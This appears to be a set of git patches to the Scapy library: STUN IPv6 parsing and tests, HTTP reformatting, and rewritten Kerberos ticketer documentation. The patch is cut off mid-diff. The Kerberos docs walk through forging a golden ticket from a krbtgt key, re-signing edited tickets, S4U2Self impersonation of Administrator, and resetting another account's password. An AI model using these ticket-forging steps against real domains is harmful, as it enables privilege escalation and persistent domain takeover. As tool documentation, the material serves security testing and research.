super().i2m(pkt, x) + return self._xor_address(pkt, addr) + + def _xor_address(self, pkt, addr): + xor_words = [pkt.parent.magic_cookie] + xor_words += struct.unpack( + ">III", pkt.parent.transaction_id.to_bytes(12, "big") + ) + addr_words = struct.unpack(">IIII", addr) + xor_addr = [a ^ b for a, b in zip(addr_words, xor_words)] + return struct.pack(">IIII", *xor_addr) class STUNXorMappedAddress(STUNGenericTlv): @@ -157,11 +179,36 @@ class STUNXorMappedAddress(STUNGenericTlv): fields_desc = [ XShortField("type", 0x0020), - ShortField("length", 8), + FieldLenField("length", None, length_of="xip", adjust=lambda pkt, x: x + 4), ByteField("RESERVED", 0), ByteEnumField("address_family", 1, _xor_mapped_address_family), XorPort("xport", 0), - XorIp("xip", 0) # FIXME <- only IPv4 addresses will work + MultipleTypeField( + [ + (XorIp("xip", "127.0.0.1"), lambda pkt: pkt.address_family == 1), + (XorIp6("xip", "::1"), lambda pkt: pkt.address_family == 2), + ], + XorIp("xip", "127.0.0.1"), + ), + ] + + +class STUNMappedAddress(STUNGenericTlv): + name = "STUN Mapped Address" + + fields_desc = [ + XShortField("type", 0x0001), + FieldLenField("length", None, length_of="ip", adjust=lambda pkt, x: x + 4), + ByteField("RESERVED", 0), + ByteEnumField("address_family", 1, _xor_mapped_address_family), + ShortField("port", 0), + MultipleTypeField( + [ + (IPField("ip", "127.0.0.1"), lambda pkt: pkt.address_family == 1), + (IP6Field("ip", "::1"), lambda pkt: pkt.address_family == 2), + ], + IPField("ip", "127.0.0.1"), + ), ] @@ -207,6 +254,7 @@ class STUNGoogNetworkInfo(STUNGenericTlv): _stun_tlv_class = { + 0x0001: STUNMappedAddress, 0x0006: STUNUsername, 0x0008: STUNMessageIntegrity, 0x0020: STUNXorMappedAddress, @@ -259,5 +307,10 @@ def post_build(self, pkt, pay): return pkt -bind_layers(UDP, STUN, dport=3478) -bind_layers(TCP, STUN, dport=3478) +bind_bottom_up(UDP, STUN, sport=3478) +bind_bottom_up(UDP, STUN, dport=3478) +bind_top_down(UDP, STUN, sport=3478, dport=3478) + +bind_bottom_up(TCP, STUN, sport=3478) +bind_bottom_up(TCP, STUN, dport=3478) +bind_top_down(TCP, STUN, sport=3478, dport=3478) diff --git a/test/contrib/stun.uts b/test/contrib/stun.uts index 2860e55c360..f79d43ecf2e 100644 --- a/test/contrib/stun.uts +++ b/test/contrib/stun.uts @@ -78,7 +78,7 @@ assert parsed.length == 44 assert parsed.magic_cookie == 0x2112A442 assert parsed.transaction_id == 0xcfacb2a43aa2de5a9d56d85a, parsed.transaction_id assert parsed.attributes == [ - STUNXorMappedAddress(xport=40480, xip="172.20.0.42"), + STUNXorMappedAddress(length=8, xport=40480, xip="172.20.0.42"), STUNMessageIntegrity(hmac_sha1=0xb71fc9235897c802e3fff8e3d889fa41428d967d), STUNFingerprint(crc_32=0xea9b6559) ] @@ -99,14 +99,51 @@ assert STUN.stun_message_type.i2repr(None, parsed.stun_message_type) == "Binding assert parsed.length == 88 assert parsed.magic_cookie == 0x2112A442 assert parsed.transaction_id == 0x3479476534635936316a796a, parsed.transaction_id -assert parsed.attributes[0] == STUNXorMappedAddress(xport=25000, xip="172.20.0.200"), parsed.attributes +assert parsed.attributes[0] == STUNXorMappedAddress(length=8, xport=25000, xip="172.20.0.200"), parsed.attributes assert parsed.attributes == [ - STUNXorMappedAddress(xport=25000, xip="172.20.0.200"), + STUNXorMappedAddress(length=8, xport=25000, xip="172.20.0.200"), STUNUsername(length=37, username="Ht11MaRZHc4GOLJUsbu1R3YCs72HYN25:oNph"), STUNMessageIntegrity(hmac_sha1=0x4b67036dfb65ca84d63bcac86c8d5981df657031), STUNFingerprint(crc_32=0x4041e9c3) ] += test STUN binding success response IPv6 + +raw = b"\x01\x01\x00\x18\x21\x12\xa4\x42\x91\x1b\x25\x32\x99\x8d\xa0\x1c" \ + b"\xf9\xd0\x53\xd9\x00\x20\x00\x14\x00\x02\x3c\xd7\x21\x12\xa4\x42" \ + b"\x91\x1b\x25\x32\x99\x8d\xa0\x1c\xf9\xd0\x53\xd8" + +parsed = STUN(raw) +assert parsed.RESERVED == 0x00, parsed.RESERVED +assert STUN.stun_message_type.i2repr(None, parsed.stun_message_type) == "Binding success response" +assert parsed.length == 24 +assert parsed.magic_cookie == 0x2112A442 +assert parsed.transaction_id == 0x911b2532998da01cf9d053d9, parsed.transaction_id +assert len(parsed.attributes) == 1, len(parsed.attributes) +assert parsed.attributes[0].type == 0x0020, parsed.attributes[0].type +assert parsed.attributes[0].length == 20, parsed.attributes[0].length +assert parsed.attributes[0].address_family == 0x02, parsed.attributes[0].address_family +assert parsed.attributes[0].xport == 7621, parsed.attributes[0].xport +assert parsed.attributes[0].xip == "::1", parsed.attributes[0].xip + += test STUN classic binding success response + +raw = b"\x01\x01\x00\x0c\x37\x06\xd1\x4d\x38\x3a\xd6\xc8\x40\x5e\x17\x9a" \ + b"\x93\x92\xea\xa8\x00\x01\x00\x08\x00\x01\x0d\x14\xc0\xa8\x00\x05" + +parsed = STUN(raw) +assert parsed.RESERVED == 0x00, parsed.RESERVED +assert STUN.stun_message_type.i2repr(None, parsed.stun_message_type) == "Binding success response" +assert parsed.length == 12 +assert parsed.magic_cookie == 0x3706d14d +assert parsed.transaction_id == 0x383ad6c8405e179a9392eaa8, parsed.transaction_id +assert len(parsed.attributes) == 1, len(parsed.attributes) +assert parsed.attributes[0].type == 0x0001, parsed.attributes[0].type +assert parsed.attributes[0].length == 8, parsed.attributes[0].length +assert parsed.attributes[0].address_family == 0x01, parsed.attributes[0].address_family +assert parsed.attributes[0].port == 3348, parsed.attributes[0].port +assert parsed.attributes[0].ip == "192.168.0.5", parsed.attributes[0].ip + = test STUN binding indication 1 raw = b"\x00\x11\x00\x08\x21\x12\xa4\x42\x29\x3d\x68\x7b\x0f\xbc\x44\x7c" \ @@ -145,4 +182,61 @@ stun = STUN( built = stun.build() parsed = STUN(built) -assert parsed.build() == built \ No newline at end of file +assert parsed.build() == built + += test STUN packet build with attributes +stun = STUN( + stun_message_type="Binding success response", + transaction_id=0x3479476534635936316a796a, + attributes=[ + STUNXorMappedAddress(xport=25000, xip="172.20.0.200"), + STUNUsername(length=37, username="Ht11MaRZHc4GOLJUsbu1R3YCs72HYN25:oNph"), + STUNMessageIntegrity(hmac_sha1=0x4b67036dfb65ca84d63bcac86c8d5981df657031), + STUNFingerprint(crc_32=0x4041e9c3) + ] +) + +built = stun.build() +parsed = STUN(built) + +assert parsed.build() == built + += test STUN packet build IPv6 + +stun = STUN( + stun_message_type="Binding success response", + transaction_id=0x911b2532998da01cf9d053d9, + attributes=[ + STUNXorMappedAddress(xport=7621, address_family="IPv6", xip="::1") + ] +) +built = stun.build() +parsed = STUN(built) + +assert parsed.build() == built +assert parsed.attributes[0].length == 20 + += test STUN bottom up binding 1 + +udp = UDP(sport=62049, dport=3478) / STUN() +built = udp.build() +parsed = UDP(built) + +assert type(parsed.payload) == STUN, parsed.show(dump=True) + += test STUN bottom up binding 2 + +udp = UDP(sport=3478, dport=62049) / STUN(stun_message_type="Binding error response") +built = udp.build() +parsed = UDP(built) + +assert type(parsed.payload) == STUN, parsed.show(dump=True) + += test STUN top down binding + +udp = UDP() / STUN() +built = udp.build() +parsed = UDP(built) + +assert parsed.sport == 3478, parsed.sport +assert parsed.dport == 3478, parsed.dport From cd17acbfd3260266578c4dd73edb7a2ab780e7b1 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 17 Apr 2025 01:57:18 +0200 Subject: [PATCH 1455/1632] Kerberos keytab support & other improvements (#4719) --- doc/scapy/layers/kerberos.rst | 451 ++++++++++++++++++------------- scapy/layers/http.py | 283 ++++++++++--------- scapy/layers/kerberos.py | 183 ++++++++++--- scapy/layers/msrpce/mspac.py | 9 + scapy/layers/smbclient.py | 14 +- scapy/modules/ticketer.py | 481 ++++++++++++++++++++++++++------- test/scapy/layers/kerberos.uts | 66 ++++- 7 files changed, 1025 insertions(+), 462 deletions(-) diff --git a/doc/scapy/layers/kerberos.rst b/doc/scapy/layers/kerberos.rst index aa9ad880138..c53af5d317c 100644 --- a/doc/scapy/layers/kerberos.rst +++ b/doc/scapy/layers/kerberos.rst @@ -6,166 +6,200 @@ Kerberos High-Level __________ -Kerberos client +Ticketer module ~~~~~~~~~~~~~~~ -Scapy includes a (tiny) kerberos client, that has basic functionalities such as: - -AS-REQ ------- - -.. note:: Full doc at :func:`~scapy.layers.kerberos.krb_as_req`. ``krb_as_req`` actually calls a Scapy automaton that has the following behavior: - - .. image:: ../graphics/kerberos/kerberos_atmt.png - :align: center +Scapy implements a **Ticketer** module, in order to manipulate Kerberos tickets. +Ticketer++ is easy to use programmatically, and allows you to manipulate the tickets yourself. +Scapy's ticketer++ implements all fields from RFC4120, [MS-KILE] and [MS-PAC], meaning you can edit ANY field in a ticket to your likings. -.. code:: pycon +- **Request TGT/ST**: - >>> res = krb_as_req("user1@DOMAIN.LOCAL", password="Password1") +.. code:: -This is what it looks like with wireshark: + >>> load_module("ticketer") + >>> t = Ticketer() + >>> t.request_tgt("Administrator@DOMAIN.LOCAL") + Enter password: ************ + >>> t.show() + Tickets: + 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + >>> t.request_st(0, "host/dc1.domain.local") + >>> t.show() + Tickets: + 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + Start time End time Renew until Auth time + 31/08/23 11:38:34 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 -.. image:: ../graphics/kerberos/wireshark_asreq.png - :align: center -The result is a named tuple with both the full AP-REP and the decrypted session key: +- **Renew TGT/ST**: Scapy's ticketer can be used to renew TGT or ST. -.. code:: pycon +.. code:: - >>> res.asrep.show() - ###[ KRB_AS_REP ]### - pvno = 0x5 - msgType = 'AS-REP' 0xb - \padata \ - |###[ PADATA ]### - | padataType= 'PA-ETYPE-INFO2' 0x13 - | \padataValue\ - | |###[ ETYPE_INFO2 ]### - | | \seq \ - | | |###[ ETYPE_INFO_ENTRY2 ]### - | | | etype = 'AES-256' 0x12 - | | | salt = - | | | s2kparams = None - crealm = - [...] - >>> res.sessionkey.toKey() - + >>> load_module("ticketer") + >>> t = Ticketer() + >>> t.request_tgt("Administrator@DOMAIN.LOCAL") + Enter password: ************ + >>> t.request_st(0, "host/dc1.domain.local") + >>> t.show() + Tickets: + 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + Start time End time Renew until Auth time + 31/08/23 11:38:34 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 -Some more examples: + 1. Administrator@DOMAIN.LOCAL -> host/dc1.domain.local@DOMAIN.LOCAL + Start time End time Renew until Auth time + 31/08/23 11:39:07 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 + >>> t.renew(0) # renew TGT + >>> t.renew(1) # renew ST -**Enforce RC4:** +- **Use ticket as SSP**: the ``.ssp()`` function. .. code:: pycon - >>> from scapy.libs.rfc3961 import EncryptionType - >>> res = krb_as_req("user1@DOMAIN.LOCAL", etypes=[EncryptionType.RC4_HMAC]) + >>> # We use ticket 1 from the above store. + >>> smbclient("dc1.domain.local", ssp=t.ssp(1)) -**Ask for a DES_CBC_MD5 sessionkey:** +- **Perform S4U2Self** .. code:: pycon - >>> from scapy.libs.rfc3961 import EncryptionType - >>> res = krb_as_req("user1@DOMAIN.LOCAL", etypes=[EncryptionType.DES_CBC_MD5, EncryptionType.RC4_HMAC]) - -TGS-REQ -------- - -.. note:: Full doc at :func:`~scapy.layers.kerberos.krb_tgs_req`. ``krb_tgs_req`` actually calls a Scapy automaton. - -**Ask for a ST:** - -Let's reuse the TGT and session key we got in the AS-REQ: + >>> load_module("ticketer") + >>> t = Ticketer() + >>> t.request_tgt("SERVER1$@domain.local", key=Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, bytes.fromhex("63a2577d8bf6abeba0847cded36b9aed202c23750eb9c56b6155be1cc946bb1d"))) + >>> t.request_st(0, "host/SERVER1", for_user="Administrator@domain.local") + >>> t.show() + CCache tickets: + 0. SERVER1$@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + canonicalize+pre-authent+initial+renewable+forwardable + Start time End time Renew until Auth time + 15/04/25 20:15:17 16/04/25 06:10:22 16/04/25 06:10:22 15/04/25 20:15:17 + + 1. Administrator@domain.local -> host/SERVER1@DOMAIN.LOCAL + canonicalize+pre-authent+renewable+forwardable + Start time End time Renew until Auth time + 15/04/25 20:15:20 16/04/25 06:10:22 16/04/25 06:10:22 15/04/25 20:15:17 + +- **Change password using kpasswd in 'set' mode:** .. code:: pycon - >>> krb_tgs_req("user1@DOMAIN.LOCAL", "host/DC1", sessionkey=res.sessionkey, ticket=res.asrep.ticket) - -.. note:: - - There is also a :func:`~scapy.layers.kerberos.krb_as_and_tgs` function that does an AS-REQ then a TGS-REQ:: - - >>> krb_as_and_tgs("user1@DOMAIN.LOCAL", "host/DC1", password="Password1") + >>> t = Ticketer() + >>> t.request_tgt("Administrator@domain.local") + Enter password: ************ + >>> t.kpasswdset(0, "SERVER1$@domain.local") + INFO: Using 'Set Password' mode. This only works with admin privileges. + Enter NEW password: *********** -Other things you can do: +- **Import tickets** -**Renew a TGT:** +.. note:: We first added a realm ``DOMAIN.LOCAL`` with a kdc to ``/etc/krb5.conf`` .. code:: pycon - >>> krb_tgs_req("user1@DOMAIN.LOCAL", "krbtgt/DOMAIN.LOCAL", sessionkey=res.sessionkey, ticket=res.asrep.ticket, renew=True) - -**Renew a ST:** + $ kinit Administrator@DOMAIN.LOCAL + Password for Administrator@DOMAIN.LOCAL: + $ scapy + >>> load_module("ticketer") + >>> t = Ticketer() + >>> t.open_file("/tmp/krb5cc_1000") + >>> t.show() + Tickets: + 1. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + Start time End time Renew until Auth time + 31/08/23 12:08:15 31/08/23 22:08:15 01/09/23 12:08:12 31/08/23 12:08:15 -.. note:: For some mysterious reason, this is rarely implemented in other tools. +- **Export tickets** .. code:: pycon - >>> res2 = krb_tgs_req("user1@DOMAIN.LOCAL", "host/DC1", sessionkey=res.sessionkey, ticket=res.asrep.ticket) - >>> krb_tgs_req("user1@DOMAIN.LOCAL", "host/DC1", sessionkey=res2.sessionkey, ticket=res2.tgsrep.ticket, renew=True) - + >>> load_module("ticketer") + >>> t = Ticketer() + >>> t.request_tgt("Administrator@domain.local", password="ScapyScapy1") + >>> t.save("/tmp/krb5cc_1000") + >>> exit() + $ klist + Ticket cache: FILE:/tmp/krb5cc_1000 + Default principal: Administrator@DOMAIN.LOCAL -KerberosSSP -~~~~~~~~~~~ + Valid starting Expires Service principal + 08/31/2023 12:08:15 08/31/2023 23:08:15 krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + renew until 09/01/2023 12:08:12 -For Kerberos, the Scapy SSP is implemented in :class:`~scapy.layers.kerberos.KerberosSSP`. -You can typically use it in :class:`~scapy.layers.smbclient.SMB_Client`, :class:`~scapy.layers.smbserver.SMB_Server`, :class:`~scapy.layers.msrpce.rpcclient.DCERPC_Client` or :class:`~scapy.layers.msrpce.rpcserver.DCERPC_Server`. +- **Load and use keytab for client** -.. note:: Remember that you can wrap it in a :class:`~scapy.layers.spnego.SPNEGOSSP` +.. code:: pycon -Ticketer++ -~~~~~~~~~~ + >>> load_module("ticketer") + >>> t = Ticketer() + >>> t.open_keytab("test.keytab") + >>> t.show() + Keytab name: test.keytab + Principal Timestamp KVNO Keytype + Administrator@domain.local 14/04/25 21:47:59 0 AES128-CTS-HMAC-SHA1-96 + Administrator@domain.local 14/04/25 21:47:59 0 AES256-CTS-HMAC-SHA1-96 + Administrator@domain.local 14/04/25 21:47:59 0 RC4-HMAC + + No tickets in CCache. + >>> t.request_tgt("Administrator@domain.local") -Scapy also implements a "ticketer++" module, named as a tribute to impacket's, in order to manipulate Kerberos tickets. -Ticketer++ is easy to use programmatically, and allows you to manipulate the tickets yourself. -Scapy's ticketer++ implements all fields from RFC4120, [MS-KILE] and [MS-PAC], meaning you can edit ANY field in a ticket to your likings. +- **Load and use keytab for server:** -It even provides a GUI (not exactly necessary, but quite handy) that edits & rebuilds the Scapy ticket packet. +.. code:: pycon -Demo ----- + >>> t.open_keytab("server1.keytab") + >>> t.show() + Keytab name: server1.keytab + Principal Timestamp KVNO Keytype + host/Server1.domain.local@DOMAIN.LOCAL 01/01/70 01:00:00 10 RC4-HMAC + + No tickets in CCache. + >>> ssp = t.ssp("host/Server11.domain.local@DOMAIN.LOCAL") + >>> # Example: start a SMB server + >>> smbserver(ssp=ssp) -Here's a small demo of how this is usable with linux kerberos tools: +- **Create client keytab:** -.. note:: We first added a realm ``DOMAIN.LOCAL`` with a kdc to ``/etc/krb5.conf`` +.. code:: pycon -.. code:: bash + >>> t = Ticketer() + >>> t.add_cred("Administrator@domain.local", etypes="all") + Enter password: ************ + >>> t.show() + Keytab name: UNSAVED + Principal Timestamp KVNO Keytype + Administrator@domain.local 15/04/25 20:24:13 1 AES128-CTS-HMAC-SHA1-96 + Administrator@domain.local 15/04/25 20:24:13 2 AES256-CTS-HMAC-SHA1-96 + Administrator@domain.local 15/04/25 20:24:13 3 RC4-HMAC + + No tickets in CCache. - $ kinit Administrator@DOMAIN.LOCAL - Password for Administrator@DOMAIN.LOCAL: - $ klist - Ticket cache: FILE:/tmp/krb5cc_1000 - Default principal: Administrator@DOMAIN.LOCAL +- **Craft tickets**: We can start by showing how to craft a **golden ticket**: - Valid starting Expires Service principal - 08/31/2023 12:08:15 08/31/2023 22:08:15 krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL - renew until 09/01/2023 12:08:12 +.. code:: pycon - $ scapy >>> load_module("ticketer") >>> t = Ticketer() - >>> t.open_file("/tmp/krb5cc_1000") + >>> t.create_ticket() + User [User]: Administrator + Domain [DOM.LOCAL]: DOMAIN.LOCAL + Domain SID [S-1-5-21-1-2-3]: S-1-5-21-4239584752-1119503303-314831486 + Group IDs [513, 512, 520, 518, 519]: 512, 520, 513, 519, 518 + User ID [500]: 500 + Primary Group ID [513]: + Extra SIDs [] :S-1-18-1 + Expires in (h) [10]: + What key should we use (AES128-CTS-HMAC-SHA1-96/AES256-CTS-HMAC-SHA1-96/RC4-HMAC) ? [AES256-CTS-HMAC-SHA1-96]: + Enter the NT hash (AES-256) for this ticket (as hex): 6df5a9a90cb076f4d232a123d9c24f46ae11590a5430710bc1881dca337989ce >>> t.show() Tickets: - 1. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL - Start time End time Renew until Auth time - 31/08/23 12:08:15 31/08/23 22:08:15 01/09/23 12:08:12 31/08/23 12:08:15 - >>> t.edit_ticket(0) # The only thing we did in the UI was to add 1 hour to the expiration time - Enter the NT hash (AES-256) for this ticket (as hex): 6df5a9a90cb076f4d232a123d9c24f46ae11590a5430710bc1881dca337989ce - >>> t.resign_ticket(0) - >>> t.save() - >>> exit() - $ klist - Ticket cache: FILE:/tmp/krb5cc_1000 - Default principal: Administrator@DOMAIN.LOCAL - - Valid starting Expires Service principal - 08/31/2023 12:08:15 08/31/2023 23:08:15 krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL - renew until 09/01/2023 12:08:12 - -Features --------- + 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + >>> t.save(fname="blob.ccache") -- **Read/Edit/Write CCaches from other apps**: Let's assume you've acquired the KRBTGT of a KDC, plus you've used ``kinit`` to get a ticket. This ticket was saved to a ``.ccache`` file, that we'll know try to open. +- **Edit tickets with the GUI** + +Let's assume you've acquired the KRBTGT of a KDC, plus you've used ``kinit`` to get a ticket. +This ticket was saved to a ``.ccache`` file, that we'll know try to open. .. note:: @@ -229,75 +263,6 @@ Features .. note:: Remember to call ``resign_ticket`` to update the Server and KDC checksums in the PAC. -- **Request TGT/ST**: Scapy's ticketer also provides wrappers to :func:`~scapy.layers.kerberos.krb_as_req` and :func:`~scapy.layers.kerberos.krb_tgs_req`, in order to request a real ticket and store its result (typically called **diamond ticket**): - -.. code:: - - >>> load_module("ticketer") - >>> t = Ticketer() - >>> t.request_tgt("Administrator@DOMAIN.LOCAL") - Enter password: ************ - >>> t.show() - Tickets: - 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL - >>> t.request_st(0, "host/dc1.domain.local") - >>> t.show() - Tickets: - 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL - Start time End time Renew until Auth time - 31/08/23 11:38:34 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 - - 1. Administrator@DOMAIN.LOCAL -> host/dc1.domain.local@DOMAIN.LOCAL - Start time End time Renew until Auth time - 31/08/23 11:39:07 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 - >>> t.edit_ticket(1) - >>> t.resign_ticket(1) - >>> t.save(fname="req.ccache") - - -- **Renew TGT/ST**: Scapy's ticketer can be used to renew TGT or ST. - -.. code:: - - >>> load_module("ticketer") - >>> t = Ticketer() - >>> t.request_tgt("Administrator@DOMAIN.LOCAL") - Enter password: ************ - >>> t.request_st(0, "host/dc1.domain.local") - >>> t.show() - Tickets: - 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL - Start time End time Renew until Auth time - 31/08/23 11:38:34 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 - - 1. Administrator@DOMAIN.LOCAL -> host/dc1.domain.local@DOMAIN.LOCAL - Start time End time Renew until Auth time - 31/08/23 11:39:07 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 - >>> t.renew(0) # renew TGT - >>> t.renew(1) # renew ST - -- **Craft tickets**: We can start by showing how to craft a **golden ticket**, in the same way impacket's ticketer does: - -.. code:: pycon - - >>> load_module("ticketer") - >>> t = Ticketer() - >>> t.create_ticket() - User [User]: Administrator - Domain [DOM.LOCAL]: DOMAIN.LOCAL - Domain SID [S-1-5-21-1-2-3]: S-1-5-21-4239584752-1119503303-314831486 - Group IDs [513, 512, 520, 518, 519]: 512, 520, 513, 519, 518 - User ID [500]: 500 - Primary Group ID [513]: - Extra SIDs [] :S-1-18-1 - Expires in (h) [10]: - What key should we use (AES128-CTS-HMAC-SHA1-96/AES256-CTS-HMAC-SHA1-96/RC4-HMAC) ? [AES256-CTS-HMAC-SHA1-96]: - Enter the NT hash (AES-256) for this ticket (as hex): 6df5a9a90cb076f4d232a123d9c24f46ae11590a5430710bc1881dca337989ce - >>> t.show() - Tickets: - 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL - >>> t.save(fname="blob.ccache") - Cheat sheet ----------- @@ -331,6 +296,130 @@ Cheat sheet | ``t.renew(i, [...])`` | Renew a TGT/ST | +-------------------------------------+--------------------------------+ +Other useful commands +--------------------- + +To change your own password, you can use the plain ``kpasswd`` command from ``scapy.layers.kerberos``. + +.. code:: pycon + + >>> kpasswd("User1@domain.local") + Enter password: ********** + Enter NEW password: ********* + +To change the password of someone else, you can also the following. You need to have the rights to do so. You can also use the method from Scapy's Ticketer. + +.. code:: pycon + + >>> kpasswd("Administrator@domain.local", "User1@domain.local") + Enter password: ********** + Enter NEW password: ********* + +Inner-workings +~~~~~~~~~~~~~~ + +Behind the scenes, Scapy includes a (tiny) kerberos client, that has basic functionalities such as: + +AS-REQ +------ + +.. note:: Full doc at :func:`~scapy.layers.kerberos.krb_as_req`. ``krb_as_req`` actually calls a Scapy automaton that has the following behavior: + + .. image:: ../graphics/kerberos/kerberos_atmt.png + :align: center + +.. code:: pycon + + >>> res = krb_as_req("user1@DOMAIN.LOCAL", password="Password1") + +This is what it looks like with wireshark: + +.. image:: ../graphics/kerberos/wireshark_asreq.png + :align: center + +The result is a named tuple with both the full AP-REP and the decrypted session key: + +.. code:: pycon + + >>> res.asrep.show() + ###[ KRB_AS_REP ]### + pvno = 0x5 + msgType = 'AS-REP' 0xb + \padata \ + |###[ PADATA ]### + | padataType= 'PA-ETYPE-INFO2' 0x13 + | \padataValue\ + | |###[ ETYPE_INFO2 ]### + | | \seq \ + | | |###[ ETYPE_INFO_ENTRY2 ]### + | | | etype = 'AES-256' 0x12 + | | | salt = + | | | s2kparams = None + crealm = + [...] + >>> res.sessionkey.toKey() + + +Some more examples: + +**Enforce RC4:** + +.. code:: pycon + + >>> from scapy.libs.rfc3961 import EncryptionType + >>> res = krb_as_req("user1@DOMAIN.LOCAL", etypes=[EncryptionType.RC4_HMAC]) + +**Ask for a DES_CBC_MD5 sessionkey:** + +.. code:: pycon + + >>> from scapy.libs.rfc3961 import EncryptionType + >>> res = krb_as_req("user1@DOMAIN.LOCAL", etypes=[EncryptionType.DES_CBC_MD5, EncryptionType.RC4_HMAC]) + +TGS-REQ +------- + +.. note:: Full doc at :func:`~scapy.layers.kerberos.krb_tgs_req`. ``krb_tgs_req`` actually calls a Scapy automaton. + +**Ask for a ST:** + +Let's reuse the TGT and session key we got in the AS-REQ: + +.. code:: pycon + + >>> krb_tgs_req("user1@DOMAIN.LOCAL", "host/DC1", sessionkey=res.sessionkey, ticket=res.asrep.ticket) + +.. note:: + + There is also a :func:`~scapy.layers.kerberos.krb_as_and_tgs` function that does an AS-REQ then a TGS-REQ:: + + >>> krb_as_and_tgs("user1@DOMAIN.LOCAL", "host/DC1", password="Password1") + +Other things you can do: + +**Renew a TGT:** + +.. code:: pycon + + >>> krb_tgs_req("user1@DOMAIN.LOCAL", "krbtgt/DOMAIN.LOCAL", sessionkey=res.sessionkey, ticket=res.asrep.ticket, renew=True) + +**Renew a ST:** + +.. note:: For some mysterious reason, this is rarely implemented in other tools. + +.. code:: pycon + + >>> res2 = krb_tgs_req("user1@DOMAIN.LOCAL", "host/DC1", sessionkey=res.sessionkey, ticket=res.asrep.ticket) + >>> krb_tgs_req("user1@DOMAIN.LOCAL", "host/DC1", sessionkey=res2.sessionkey, ticket=res2.tgsrep.ticket, renew=True) + + +KerberosSSP +~~~~~~~~~~~ + +For Kerberos, the Scapy SSP is implemented in :class:`~scapy.layers.kerberos.KerberosSSP`. +You can typically use it in :class:`~scapy.layers.smbclient.SMB_Client`, :class:`~scapy.layers.smbserver.SMB_Server`, :class:`~scapy.layers.msrpce.rpcclient.DCERPC_Client` or :class:`~scapy.layers.msrpce.rpcserver.DCERPC_Server`. + +.. note:: Remember that you can wrap it in a :class:`~scapy.layers.spnego.SPNEGOSSP` Low-level _________ diff --git a/scapy/layers/http.py b/scapy/layers/http.py index c94fecde86f..00f1b9d6f18 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -79,18 +79,21 @@ try: import brotli + _is_brotli_available = True except ImportError: _is_brotli_available = False try: import lzw + _is_lzw_available = True except ImportError: _is_lzw_available = False try: import zstandard + _is_zstd_available = True except ImportError: _is_zstd_available = False @@ -114,13 +117,10 @@ "Pragma", "Upgrade", "Via", - "Warning" + "Warning", ] -COMMON_UNSTANDARD_GENERAL_HEADERS = [ - "X-Request-ID", - "X-Correlation-ID" -] +COMMON_UNSTANDARD_GENERAL_HEADERS = ["X-Request-ID", "X-Correlation-ID"] REQUEST_HEADERS = [ "A-IM", @@ -149,7 +149,7 @@ "Range", "Referer", "TE", - "User-Agent" + "User-Agent", ] COMMON_UNSTANDARD_REQUEST_HEADERS = [ @@ -243,7 +243,7 @@ def _parse_headers(s): headers_found = {} for header_line in headers: try: - key, value = header_line.split(b':', 1) + key, value = header_line.split(b":", 1) except ValueError: continue header_key = _strip_header_name(key).lower() @@ -252,19 +252,19 @@ def _parse_headers(s): def _parse_headers_and_body(s): - ''' Takes a HTTP packet, and returns a tuple containing: - _ the first line (e.g., "GET ...") - _ the headers in a dictionary - _ the body - ''' + """Takes a HTTP packet, and returns a tuple containing: + _ the first line (e.g., "GET ...") + _ the headers in a dictionary + _ the body + """ crlfcrlf = b"\r\n\r\n" crlfcrlfIndex = s.find(crlfcrlf) if crlfcrlfIndex != -1: - headers = s[:crlfcrlfIndex + len(crlfcrlf)] - body = s[crlfcrlfIndex + len(crlfcrlf):] + headers = s[: crlfcrlfIndex + len(crlfcrlf)] + body = s[crlfcrlfIndex + len(crlfcrlf) :] else: headers = s - body = b'' + body = b"" first_line, headers = headers.split(b"\r\n", 1) return first_line.strip(), _parse_headers(headers), body @@ -285,7 +285,7 @@ def _dissect_headers(obj, s): obj.setfieldval(f.name, value) if headers: headers = dict(headers.values()) - obj.setfieldval('Unknown_Headers', headers) + obj.setfieldval("Unknown_Headers", headers) return first_line, body @@ -297,11 +297,15 @@ def _get_encodings(self): encodings = [] if isinstance(self, HTTPResponse): if self.Transfer_Encoding: - encodings += [plain_str(x).strip().lower() for x in - plain_str(self.Transfer_Encoding).split(",")] + encodings += [ + plain_str(x).strip().lower() + for x in plain_str(self.Transfer_Encoding).split(",") + ] if self.Content_Encoding: - encodings += [plain_str(x).strip().lower() for x in - plain_str(self.Content_Encoding).split(",")] + encodings += [ + plain_str(x).strip().lower() + for x in plain_str(self.Content_Encoding).split(",") + ] return encodings def hashret(self): @@ -322,10 +326,10 @@ def post_dissect(self, s): break else: load = body[:length] - if body[length:length + 2] != b"\r\n": + if body[length : length + 2] != b"\r\n": # Invalid chunk. Ignore break - s = body[length + 2:] + s = body[length + 2 :] data += load if not s: s = data @@ -335,6 +339,7 @@ def post_dissect(self, s): try: if 